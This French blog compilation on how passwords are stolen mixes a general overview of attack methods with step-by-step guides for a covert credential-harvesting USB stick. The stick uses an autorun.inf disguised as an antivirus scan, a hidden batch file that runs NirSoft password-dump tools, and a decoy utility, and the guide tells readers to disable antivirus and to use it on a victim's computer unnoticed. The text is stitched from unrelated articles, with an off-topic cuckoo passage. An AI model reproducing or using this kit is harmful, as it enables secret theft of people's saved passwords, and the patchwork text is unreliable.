Comment voler tous les mots de passe. Comment les mots de passe sont volés

Bonne journée à tous. Le rush du Nouvel An et les vacances d’hiver sont terminés et il est temps d’écrire quelque chose sur le blog. Je souhaite consacrer le premier article de cette année à un programme éducatif sur les méthodes de vol de mots de passe, par opposition à l'un des articles précédents : lorsque vous êtes « piraté », vous n'avez pas besoin de vous précipiter pour changer tous vos mots de passe. Il convient de préciser d'emblée que le matériel s'adresse à des non-spécialistes de la sécurité de l'information et est uniquement destiné à des fins d'information. Bien que les spécialistes apprennent peut-être aussi quelque chose de nouveau par eux-mêmes.

Même si tout le monde déteste les mots de passe, ceux-ci restent à ce jour le moyen d'identification le plus populaire, mais malheureusement, ils nous sont parfois volés. L'authentification à deux facteurs permet de résoudre en partie le problème, mais seulement en partie et uniquement pour les services les plus critiques.

Selon les statistiques, les raisons les plus courantes de perte de contrôle sur les comptes sont deux choses : l'utilisation de mots de passe simples (dictionnaire) et l'ingénierie sociale. Dans cet article, je parlerai des principales méthodes de piratage des mots de passe, bien entendu, dans le but de sensibiliser un large public à ce problème (l'utilisation de matériaux à des fins destructrices est punie par la loi, l'auteur n'est pas responsable, et bla bla bla ).

  1. Devinant

Oui, c'est aussi simple que cela. Votre mot de passe peut être facilement deviné. Vous vous souvenez de tous ces épisodes de films hollywoodiens où les personnages piratent l'ordinateur de quelqu'un et essayent les noms des enfants, des grands-parents, des oncles, des tantes de la victime, les noms des animaux de compagnie de la victime, etc. comme mot de passe ? C’est donc vraiment l’une des méthodes de piratage les plus efficaces, et cette méthode archaïque est toujours efficace. Après tout, désormais tout le monde publie des tonnes d'informations sur lui-même sur les réseaux sociaux, et si le mot de passe est basé sur certaines données liées à l'identité du propriétaire du compte piraté, alors la sélection du mot de passe n'est qu'une question de temps (c'est précisément la raison pour laquelle les mots de passe doivent être modifiés périodiquement).

Contre-attaque à la méthode : en général, j'espère que vous comprenez que « tanyushka1990 » est un mauvais mot de passe, même si Tanyushka n'est pas vous, mais votre petite-fille bien-aimée. Utilisez des mots de passe qui ne sont pas intuitivement devinables. Changez les mots de passe périodiquement (au moins une fois par an), au moins pour les comptes critiques.

  1. Ingénierie sociale

L'ingénierie sociale est un concept assez large. Un ingénieur social peut interagir avec la victime à la fois en personne et par téléphone, mais interagit le plus souvent via des canaux de communication électroniques - messageries instantanées, réseaux sociaux, courrier électronique. Et ici nous ne considérerons pas les méthodes d'ingénierie sociale en tant que telles, ici je conseillerais plutôt de lire les classiques du genre - le livre de V. Simon et K. Mitnick « The Art of Deception ». Ce qui nous importe ici, c'est que les méthodes d'ingénierie sociale en matière de vol de mots de passe visent à contraindre la victime à renoncer à son mot de passe. Un exemple ressemble à ceci : un attaquant se présente comme un nouvel administrateur système et dit à un employé de votre organisation qu'il a besoin du mot de passe de l'e-mail de l'employé afin d'effectuer des tests de vide sphériques. Autre exemple où il n'y a pas de contact personnel entre l'attaquant et la victime : un mailing de fan avec un lien de phishing et un message alarmant (par exemple, votre compte a été signalé, il a été bloqué et vous « devez » suivre le lien pour débloquez-le). Le lien de phishing mène à une page préparée à l'avance par l'attaquant et similaire à la page d'autorisation de certains services populaires, par exemple : vk.com, gmail.com, facebook.com, etc. Que se passe-t-il ensuite : la victime, pensant qu'il s'agit d'un service légal, saisit son identifiant et son mot de passe, ces données d'identification sont envoyées à l'attaquant, un message d'erreur s'affiche (enfin, qui d'entre nous ne s'est jamais trompé en saisissant un mot de passe ? Tout peut arriver !) et ensuite l'utilisateur est redirigé vers la vraie page d'autorisation, car le sale boulot a déjà été fait et cela ne sert à rien de maintenir la victime sur une fausse page. À propos, si quelqu'un d'autre ne sait pas pourquoi Windows vous demande d'appuyer sur la combinaison de touches Alt-Ctrl-Suppr avant de vous connecter, je vous conseille fortement de le rechercher sur Google et de le lire.

Contrer la méthode : les entreprises utilisent généralement des méthodes hybrides pour contrer l'ingénierie sociale (dans les entreprises, bien sûr, où elles sont généralement préoccupées par les problèmes de sécurité de l'information), mais il faut comprendre que puisqu'un ingénieur social peut interagir avec la victime sans utiliser aucune communication canaux (et, par conséquent, nous ne pourrons pas filtrer, bloquer ou suivre ses messages), alors la seule méthode de contre-attaque vraiment efficace est d'informer les employés (enfin, ou vous-même, si nous parlons de sécurité personnelle) de la méthodes d’ingénierie sociale. Après tout, de nos jours, peu de gens craqueront pour l'héritage d'un prince nigérian ou le divorce « Maman, envoie de l'argent au numéro XXXX. Je l’expliquerai plus tard », mais ces méthodes fonctionnaient autrefois.

  1. Voyeurisme

Ici, je ne mentionnerai que brièvement des choses aussi évidentes que les mots de passe sur des autocollants collés sur le moniteur ou sur des morceaux de papier sous le clavier. Ici, l’espionnage peut également être compris comme l’espionnage du processus de saisie d’un mot de passe. Autrement dit, il est préférable de saisir le mot de passe lorsque personne ne surveille le processus. Il y a des gens avec des capacités intéressantes. Par exemple, un de mes amis a parié avec moi qu'il me regarderait saisir un mot de passe sur un ordinateur portable, puis répéter lui-même le mot de passe. Et il l'a effectivement répété. J'ai été très surpris, car je sais taper à dix doigts et je peux saisir mon mot de passe très rapidement. Il s'est avéré que l'ami avait une sorte de mémoire photographique particulière. Homme dangereux =)

Autrement dit, l'espionnage aide un attaquant à obtenir rapidement un mot de passe prêt à l'emploi et à ne pas recourir à d'autres techniques plus complexes ou gourmandes en ressources, qui seront discutées ci-dessous. Mais regarder le mot de passe « avec les yeux » n’est pas le seul moyen. Par exemple, si vous avez entré votre mot de passe sur l'ordinateur de quelqu'un d'autre et que vous avez accidentellement enregistré le mot de passe, vous êtes déconnecté du compte, mais n'avez pas effacé les données, alors quelqu'un d'autre peut non seulement se connecter au compte sans connaître le mot de passe (ce n'est pas si mal ), mais aussi récupérer ce mot de passe explicitement en insérant ce simple script dans la barre d'adresse du navigateur sur la page où sont saisis le nom d'utilisateur et le mot de passe (déguisés par des astérisques) :

javascript:(function())(var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;% 20j

[effondrement]

Si le mot de passe est utilisé sur d'autres comptes, l'attaquant peut également y accéder. C’est pourquoi les experts en sécurité déconseillent catégoriquement d’utiliser le même mot de passe pour différents comptes.

Contre-méthode : Ne saisissez pas votre mot de passe lorsque quelqu'un se tient à côté de vous et regarde vos mains. Ne saisissez pas votre mot de passe sur des appareils non fiables. Si cela s’avère néanmoins nécessaire, veillez à effacer les informations sur les mots de passe et les cookies. De plus, des enregistreurs de frappe peuvent être installés sur des appareils non fiables.

  1. Sélection de mots de passe à l'aide de dictionnaires

Nous sommes passés en douceur de techniques de vol de mots de passe intuitives et frauduleuses à des techniques techniques. Le premier d'entre eux consiste à sélectionner des mots de passe à l'aide de dictionnaires. Peut-être que même des non-spécialistes dans le domaine de la sécurité de l'information ont entendu parler d'importantes fuites de mots de passe dans les boîtes aux lettres de divers services de messagerie. Comme il s’est avéré plus tard, la plupart de ces fuites n’étaient pas associées au piratage des serveurs du fournisseur de services, mais à la sélection banale de mots de passe pour les boîtes aux lettres à l’aide de dictionnaires. La plupart des mots de passe des boîtes aux lettres « piratées » étaient des combinaisons telles que « 123456 », « qwerty », etc. Dans la section « Matériaux », j'ai posté quelques dictionnaires avec des mots de passe (vous pouvez les remplir vous-même), qui peuvent être utilisés soit dans divers outils comme John l'Éventreur ou Hydra, soit pour vérifier avec une recherche banale si votre mot de passe est dans le dictionnaire. Si c'est le cas, alors nous le changeons de toute urgence !

Contre-méthode : utilisation de mots de passe complexes ne provenant pas d'un dictionnaire.

  1. Force brute

Le nom de la méthode vient de deux mots anglais : brute - brute et force - force. D'après le nom, il est clair intuitivement en quoi cette méthode diffère de la précédente - ici, toutes les combinaisons de mots de passe possibles sont simplement essayées. La méthode prend du temps et des ressources, car la sélection utilisant cette méthode nécessite des ressources informatiques considérables. Par conséquent, les attaquants n’ont recours à cette méthode que dans des cas extrêmes. Par exemple, connaître la longueur exacte du mot de passe ou savoir que le mot de passe ne contient certainement pas de caractères spéciaux ni de chiffres peut réduire le temps de sélection. Cela réduit le nombre de combinaisons possibles.

Contre-mesures : utilisation de mots de passe longs et chaotiques et modification périodique des mots de passe.

  1. Tables arc-en-ciel

Quiconque a dû récupérer un mot de passe pour n'importe quel service ces dernières années a dû remarquer que si auparavant certains services vous envoyaient simplement votre mot de passe par e-mail, vous devez désormais immédiatement proposer un nouveau mot de passe. Cela est dû au fait qu’aucun service qui se respecte ne stocke les mots de passe en texte clair. Les mots de passe sont stockés sous forme de hachages. En bref, un hachage est le résultat de la transformation d'un texte (dans notre cas, un mot de passe) par une fonction mathématique irréversible. Le résultat de la conversion du mot « mot de passe » (sans les guillemets) à l'aide de l'algorithme MD5 commun ressemble à ceci :. C'est à peu près ainsi que nos mots de passe sont stockés par les prestataires de services, et comme on pense que les fonctions sont irréversibles, il semble que les prestataires eux-mêmes ne puissent pas connaître notre mot de passe et nous l'envoyer en texte clair. Vous pouvez en savoir plus sur le hachage.

Les tables arc-en-ciel, pour le dire très grossièrement, permettent de récupérer un mot de passe à l'aide d'un hachage. Le processus complet est bien sûr beaucoup plus compliqué qu’il n’y paraît. Par conséquent, ceux qui souhaitent en savoir plus sur la technologie peuvent commencer par la page Wikipédia. Il semblerait qu'en utilisant les tables arc-en-ciel, il serait possible de déchiffrer presque n'importe quel mot de passe, mais cela présente également ses propres difficultés pour un attaquant. Si la force brute nécessite du temps et des ressources pour la recherche elle-même, alors dans le cas des tables arc-en-ciel, la même chose est nécessaire pour générer ces mêmes tables. De plus, tout ensemble de tables arc-en-ciel aura de nombreuses restrictions, notamment : une limite sur la longueur du mot de passe, une limite sur le jeu de caractères et une limite sur un algorithme de hachage spécifique. Sur Internet, dans le domaine public, vous pouvez trouver des tableaux arc-en-ciel pour sélectionner des mots de passe ne dépassant pas 6 caractères, qui contiennent uniquement des lettres de l'alphabet anglais des deux registres, mais sans caractères spéciaux ni chiffres. Mais maintenant, ils demandent de l’argent pour quelque chose de plus sérieux.

Contre-mesures : saler les hachages. Malheureusement, ce type de contre-action n'est disponible qu'au niveau des administrateurs de services et ne dépend en aucun cas des actions de l'utilisateur final.

  1. Méthodes hybrides

Les méthodes hybrides désignent une combinaison des différentes méthodes présentées ci-dessus. En fait, un exemple d'utilisation des méthodes « force brute » + « voyeur » a déjà été donné ci-dessus. Par exemple, un attaquant ne peut pas voir l'intégralité du mot de passe, mais uniquement les caractères qui composent le mot de passe. Cela lui permettra de spécifier uniquement les symboles nécessaires dans les paramètres lors de la force brute, et d'exclure tous les autres de la recherche, réduisant ainsi considérablement le nombre de combinaisons possibles.

Autre exemple de méthode hybride : un mot du dictionnaire est pris et les lettres qu'il contient sont remplacées par des caractères spéciaux. Par exemple, prenez le mot de passe du dictionnaire « password » et essayez les combinaisons « password123 », « p@ssword », « pa$$w0rd », etc.

Lutter contre les méthodes hybrides implique d’utiliser toutes les contre-mesures énumérées ci-dessus.



réel temps de prison!

Essayons de comprendre comment voler les mots de passe d'un ordinateur si vous y avez accès, mais sans que la victime ne se doute de rien.

Une solution consiste à créer un lecteur flash spécial avec des utilitaires capables d'extraire les mots de passe des navigateurs et d'autres programmes qui enregistrent les mots de passe pour la commodité de l'utilisateur.

Téléchargeons les utilitaires de récupération de mot de passe dont nous avons besoin :

* MessenPass - récupère les mots de passe des programmes de messagerie instantanée les plus populaires : MSN Messenger, Windows Messenger (sous Windows XP), Windows Live Messenger (sous Windows XP et Vista), Yahoo Messenger (version 5.x/6.x), ICQ Lite 4 .x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda et GAIM ;

* Mail PassView - récupère les mots de passe enregistrés des clients de messagerie : Outlook Express, Microsoft Outlook 2000 (comptes POP3/SMTP uniquement), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, et comptes de messagerie Web ;

* IE Passview - affiche les identifiants et mots de passe enregistrés par « l'âne » ;

* ChromePass - affiche les identifiants et les mots de passe enregistrés par le navigateur Google Chrom ;

* PasswordFox - reçoit tous les mots de passe enregistrés par Firefox ;

* Protected Storage PassView - récupère tous les mots de passe enregistrés dans le stockage protégé ;

* Dialupass - récupère tous les mots de passe de session d'accès commuté/VPN ;

* Récupération de mot de passe réseau - affiche les mots de passe que vous utilisez pour votre partage réseau local ainsi que les mots de passe des comptes .NET Passport/Messenger ;

* PstPassword - extrait les mots de passe des fichiers de dossiers personnels Outlook - .PST ;

* WirelessKeyView - récupère toutes les clés de réseau sans fil (WEP/WPA) stockées sur votre ordinateur.

Il existe également un utilitaire appelé OperaPassView, mais il ne prend pas encore en charge la ligne de commande. Nous ne l’incluons donc pas dans notre ensemble.
Tous les services publics peuvent être pris.

Nous avons également besoin de l'utilitaire Hidden Start().

Nous le téléchargerons également afin de masquer nos utilitaires. Nous l'exécuterons à la fin de l'opération d'extraction du mot de passe. Et seul son travail sera vu par la victime sur son écran.

Nous préparons la clé USB.

1. Créez deux dossiers sur la clé USB :
lecteur flash :\prog\
lecteur flash :\prog\log\

2. Dans le dossier du lecteur flash :\prog\ téléchargez tous les exécutables – utilitaires, hstart.exe, KK.exe

3. À la racine du lecteur flash, créez autorun.inf avec le contenu suivant :


open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Analyser votre ordinateur à la recherche de virus


Ici, l'action est un bouton qui sera affiché dans la fenêtre de sélection d'action lorsqu'un lecteur flash est connecté, et open est une commande qui doit être exécutée lorsque cette action est sélectionnée. Cette commande inclut le lancement du fichier batch en mode caché à l'aide de l'utilitaire Hidden Start.

4. Créez un fichier batch launch.bat :

Écho off
echo %computername%\%username% bte% %time% >> prog/log/_log.txt
démarrer prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
démarrer prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
démarrer prog/iepv.exe /stext prog/log/%computername%_iepv.txt
démarrer prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
démarrer prog/mspass.exe /stext prog/log/%computername%_mspass.txt
démarrer prog/netpass.exe /stext prog/log/%computername%_netpass.txt
démarrer prog/pspv.exe /stext prog/log/%computername%_pspv.txt
démarrer prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
démarrer prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

S'il n'existe pas "%programfiles%\Mozilla Firefox\" GoTo End
démarrer prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:Fin
démarrer prog/KK.exe

Examinons de plus près les commandes du fichier batch :

echo off – interdiction d'afficher les résultats de l'exécution dans la fenêtre CMD

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – écrivez le nom de l'ordinateur, le nom d'utilisateur, la date et l'heure dans le fichier prog/log/_log.txt

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – exécutez l'utilitaire ChromePass.exe qui, une fois exécuté, devrait enregistrer les mots de passe dans le fichier prog/log/computername_chrom.txt

Il en va de même pour les autres utilitaires. La seule remarque est qu’avant de lancer PasswordFox.exe, nous vérifierons que FF est installé sur l’ordinateur de la victime. C'est juste que si FF n'est pas installé, l'utilitaire PasswordFox.exe affiche un message d'erreur.

démarrer prog/KK.exe – nous masquons nos actions en lançant un véritable utilitaire pour supprimer le ver Net-Worm.Win32.Kido de Kaspersky Lab

Ça y est, la clé USB est prête. Désormais, un attaquant doit simplement connecter une clé USB à l'ordinateur de la victime et sélectionner « Rechercher des virus sur l'ordinateur » dans la fenêtre contextuelle qui apparaît pour récupérer tous les mots de passe enregistrés sur cet ordinateur. La raison pour laquelle vous effectuez une « analyse antivirus » est assez simple, surtout si la victime vous fait confiance.

Comment lutter ?

1. N'enregistrez pas les mots de passe - il est préférable d'utiliser une sorte de programme comme Password Keeper ou eWallet.

3. Avoir un bon antivirus est indispensable ! Bien qu'il ne jure que sur quelques-uns de ces utilitaires.

La raison de la rédaction de cet article était un article dans le magazine "Hacker".

Cet article est rédigé à titre informatif uniquement.
Son but est de protéger vos données d’un attaquant.
Celui qui est conscient est armé !

Le vol des mots de passe d'autrui engage la responsabilité pénale en vertu de la partie 1 de l'art. 272 du Code pénal de la Fédération de Russie « Accès illégal à des informations informatiques » et menace réel temps de prison!

Les criminels font de grands efforts pour voler les mots de passe des utilisateurs sur toutes sortes de ressources réseau : pages de réseaux sociaux, jeux en ligne, systèmes de paiement. Les statistiques sur le vol d’identité en ligne regorgent de chiffres alarmants. Afin de ne pas faire partie des victimes qui ont perdu leur compte, examinons les principales méthodes de vol de mots de passe utilisées par les pirates -, et. Ayant une compréhension de ces « technologies » malveillantes, il est possible de les contrer efficacement tout en maintenant le niveau approprié de sécurité et de confidentialité des données personnelles.

Le triomphe de la justice et de la vengeance a lieu pendant la période d'alimentation. Les poussins des fées blanches, voyant leurs parents s'approcher du nid avec des friandises dans le bec, se mettent à sonner aussi fort qu'ils le peuvent, le même trille qu'on leur a appris à chanter dans les premiers jours de leur vie. Seuls les interprètes du « motif indigène » sont les héritiers légaux, et les poussins coucous se retrouvent sans rien et meurent bientôt de faim.

À première vue, c'est une image vivante de la nature, mais comme elle ressemble aux étendues infinies de la jungle numérique d'Internet : il y a ici aussi des mots de passe ; et il y a des personnages - mauvais et bons - des pirates informatiques et des utilisateurs ordinaires.

Alors, cher lecteur, afin de protéger vos précieux identifiants et mots de passe des personnes malveillantes, vous n’aurez bien sûr pas besoin d’apprendre des trilles. Mais se familiariser avec les méthodes de vol de données personnelles ne sera pas du tout superflu... Voulez-vous la paix ? Préparez-vous pour la guerre !

L'arme principale de l'attaquant dans cette méthode est la naïveté et la curiosité excessive de l'utilisateur. Pas de méthodes logicielles sophistiquées, de virus insidieux ou d'autres technologies de piratage.

Le méchant, ne connaissant que le login de la boîte aux lettres, le saisit dans le formulaire de connexion au service. Et puis il dit au système qu'il a oublié son mot de passe. Une question de sécurité s'affiche sur le moniteur - le cambrioleur ne connaît pas la réponse, mais connaît déjà son contenu. C'est ici que commence la partie « intéressante » : en fonction du sujet de la question, il envoie à la victime une « lettre rusée » dans laquelle, sous une forme voilée, il essaie de trouver la bonne réponse. Un message insidieux pourrait ressembler à ceci : « Bonjour ! Nous, le site culinaire tel ou tel,.....etc. Quel est ton plat préféré? Et ce n'est qu'un exemple distinct. Des astuces de ce genre consistent à « se promener sur Internet » grande divinité . Nous avons écrit davantage sur l'ingénierie sociale dans un article. Alors gardez les yeux ouverts lorsque vous lisez des lettres !

Vol de cookies

Les cookies (de l'anglais « cookie » - cookies) sont un fichier contenant des données de session qu'un site Web stocke dans le navigateur de l'utilisateur. Il stocke, sous forme hachée, le login, le mot de passe, l'identifiant et d'autres informations auxquelles la ressource accède périodiquement pendant le travail en ligne.

Un pirate informatique, connaissant les vulnérabilités d'un site particulier (forum, service de messagerie, réseau social), écrit un script spécial qui « extrait » les cookies du navigateur de la victime et les lui envoie. Cette « sale action » ne peut se faire sans la participation du propriétaire du compte, puisque c'est lui qui doit lancer le script malveillant. Ainsi, avant l'envoi, le code est enveloppé dans un « appât » spécial : une photo, une lettre alléchante, une demande, etc. La tâche principale est pour la victime de suivre le lien fourni. Et si cela se produit, le script du hacker transfère les cookies du navigateur vers un sniffer (intercepteur de trafic réseau) installé sur un hébergement tiers. Et ce n'est qu'alors qu'il dirige l'utilisateur là où il a été promis dans le message - vers un site de rencontre, un hébergement vidéo, une galerie de photos, etc. Naturellement, le propriétaire du compte ne se doute de rien de ces manipulations - la procédure perfide ne prend que 5 secondes.

Pour laisser un attaquant par force brute avec son nez, créez des mots de passe complexes, utilisez.

Comment voler les mots de passe de Windows.

Bonjour à tous, aujourd'hui je me permets d'aborder un autre sujet qui, me semble-t-il, intéressera beaucoup. Nous allons créer un outil spécial qui nous permettra d'afficher et de sauvegarder tous les mots de passe enregistrés dans Windows. Le vôtre ou celui de quelqu'un d'autre. Tout simplement, voler des mots de passe .

Développons le sujet. Quels navigateurs utilisez-vous ? Combien y en a-t-il dans les fenêtres ? Question bête : utilisez-vous les réseaux sociaux ? D'autres projets sociaux ? Chacun de nous dispose de plusieurs ressources de ce type. Chacun d'eux nécessite un mot de passe, qui est stocké dans le même navigateur. C'est confortable. Mais ce n’est pas sûr, et vous comprendrez maintenant pourquoi. Il existe des utilitaires qui permettront voler des mots de passe depuis les navigateurs de toute rayure pour les sites Web.

Vous avez oublié le mot de passe de votre routeur ? Ou as-tu un câble séparé ? Aucune différence - l'utilitaire inclus dans le package permettra voler des mots de passe Internet. Avez-vous acheté Windows honnêtement avec votre argent durement gagné ? A-t-il été installé avec l'ordinateur et l'ordinateur portable achetés ? Mais chaque fois que vous vous connectez, Windows vérifie dans la base de données les résultats du travail. Une clé d'activation Windows unique est une condition requise pour l'authentification. Nous parlerons également de l'endroit où il est stocké. Il existe un utilitaire qui permettra voler les clés du système et les mots de passe. Il y aura également une clé du colis. Microsoft Office…

en pleine vue…

Avez-vous des clients de messagerie sur votre ordinateur ? Microsoft Outlook, Filezilla, Mozilla Thunderburd? Lorsque vous vous connectez à la messagerie, le client de messagerie envoie les mots de passe des boîtes aux lettres aux serveurs du serveur de messagerie... Il existe un utilitaire qui permettra voler les mots de passe des boîtes aux lettres.

Je vais maintenant vous montrer comment extraire les éléments les plus secrets de Windows en quelques clics de souris.

Et des mots de passe même pour les programmes distants et les navigateurs sous quelque forme que ce soit.

Comment voler les mots de passe de Windows ?

Nous utiliserons des programmes de NirSoft. Les développeurs disposent de nombreux utilitaires « utiles ». Nous allons maintenant considérer ceux qui nous aideront dans des tâches spécifiques. Tous les programmes présentés ont une version portable et ne nécessitent aucune installation. Sur le site Internet du fabricant, vous pouvez toutefois télécharger des fichiers de russification afin de voler les mots de passe du système, ils ne sont pas très importants.

Afin de « voler les mots de passe » de Windows, nous avons besoin de :

  • une clé USB gratuite (elle peut être utilisée aux fins prévues même après avoir été « affûtée » pour récupérer les mots de passe) ;
  • une collection des programmes eux-mêmes (vous pouvez la télécharger directement depuis mon site)
  • quelques manipulations avec les documents du Bloc-notes.
  • La moitié de ces programmes sont identifiés comme « malwares » au stade du téléchargement par le navigateur. Que dire des antivirus... Alors avant d'utiliser l'outil que vous avez créé, vous devrez DÉSACTIVER l'antivirus.
  • l'exécution de certains utilitaires nécessitera des droits d'administrateur

JE GARANTIT QUE L'ASSEMBLAGE TÉLÉCHARGÉ EST EXEMPT DE VIRUS. CEPENDANT, LA NATURE DU FONCTIONNEMENT DES PROGRAMMES EST SIMILAIRE AUX ACTIONS DES SNIFERS. L'ANTI-VIRUS SIGNALERA DONC LES « PROBLÈMES » PLUS DE FOIS.

Commençons le travail.

  • Désactivons l'antivirus. Temporairement.
  • . Je l'ai emballé deux fois afin de perdre au moins un peu de temps et de ne pas me faire bannir par les moteurs de recherche, qui n'aiment pas de tels programmes. Archiver le mot de passe

ordinateur76

  • Préparons notre clé USB. Oui, il n'y a rien pour cuisiner, vous aurez besoin de peu d'espace. Pourquoi une clé USB ? Il est portable, parfois de petite taille et même invisible. Vos manipulations peuvent rester inaperçues même pour la victime, qui devrait se rendre à la cuisine pour boire du café.
  • Décompressez les programmes sur la clé USB. Pas dans n'importe quel dossier, mais dans un chemin direct, afin qu'ils soient disponibles lorsque vous ouvrez la clé USB. Les utilitaires décompressés lanceront en masse un fichier bat portant le nom commencer .

Ce fichier bat a été créé dans le Bloc-notes standard. , lisez ici. Le document contient du code pour lancer automatiquement les utilitaires et les enregistrer dans les fichiers texte appropriés. Vous pouvez le renommer et visualiser sa composition en utilisant le même Bloc-notes.

Après avoir lancé le fichier batch, chacun des programmes s'ouvrira dans une fenêtre séparée avec tous vos mots de passe (ou ceux d'autres personnes) et/ou tentera de créer un fichier texte dans lequel les mots de passe trouvés seront affichés. Opéra, Firefox, Internet Explorer, les clients de messagerie et lui-même les fenêtres. Tout prendra quelques secondes. Entraînez-vous lentement sur votre ordinateur.

Nous verrons comment utiliser correctement, rapidement et le plus discrètement possible les compétences acquises sur l’ordinateur d’autrui dans l’un des articles suivants.

Lire : 321

Partager